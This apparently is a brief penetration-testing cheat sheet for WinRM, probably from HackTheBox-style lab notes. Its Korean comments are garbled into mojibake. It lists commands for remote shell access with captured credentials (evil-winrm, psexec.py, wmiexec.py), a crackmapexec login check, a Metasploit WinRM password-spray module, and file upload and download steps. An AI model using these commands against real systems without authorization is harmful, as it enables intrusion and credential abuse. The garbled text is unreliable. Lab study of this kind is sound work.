5985, 5986 - Winrm
// Winrm ์๊ฒฉ์ ์
evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180
psexec.py 'administrator:!R3m0te!@10.10.10.180'
wmiexec.py 'administrator:!R3m0te!@10.10.10.180'
// Winrm ์ ์๋๋์ง ํ
์คํธ
crackmapexec winrm 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
๋ง์ฝ smb ๊ณ์ ๊ณผ ๋น๋ฐ๋ฒํธ๋ฅผ ์ป์๋ค๋ฉด winrm ์ ์์๋๋ฅผ ํ๋ฒ์ ํด๋ณด๋ ๊ฒ์ด ์ข๋ค
// Winrm ๋น๋ฐ๋ฒํธ ์คํ๋ ์ด
msf5 auxiliary(scanner/winrm/winrm_login) run
[Set RHOST, RPORT, USERNAME, PASSWORD]
//ํ์ผ ์
๋ก๋
upload ์
๋ก๋ ํ ํ์ผuse
//ํ์ผ ๋ค์ด๋ก๋
download ํ์ผ ์ด๋ฆ(/opt/evil-winrm์ ๋ค์ด๋ฐ์ ํด๋ ์์ฑ)
Last updated